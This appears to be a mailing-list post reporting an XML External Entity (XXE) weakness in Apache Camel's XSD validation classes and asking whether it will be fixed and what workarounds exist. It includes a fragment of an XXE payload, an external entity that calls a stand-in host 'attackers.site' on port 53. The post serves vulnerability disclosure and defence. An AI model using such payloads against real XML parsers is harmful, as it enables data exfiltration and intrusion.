XML External Entity (XXE) - validator vulnerability ?
we are using XSD validation processor by camel-core library
Our penetration tests found that application can be attacked by "XML
External Entity (XXE)"
We think that classes infected by this vulnerability are
Method SchemaReader.createSchemaFactory should also set property
Method ValidatingProcessor.doProcess should set property to validator class
Validator validator = schema.newValidator();
//prevent XXE attack
If we try to validate infected XML against XSD we can see that camel is
trying to access external site (attackers.site) in this example
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attackers.site:53/TEST">
Disabling mentioned properties should do the trick
I would like to ask you if this will be created as a security BUG in
camel and if it will be fixed in the future version?
Can we use some workaround? Write our custom implementation of
ValidatingProcessor? Is it possible?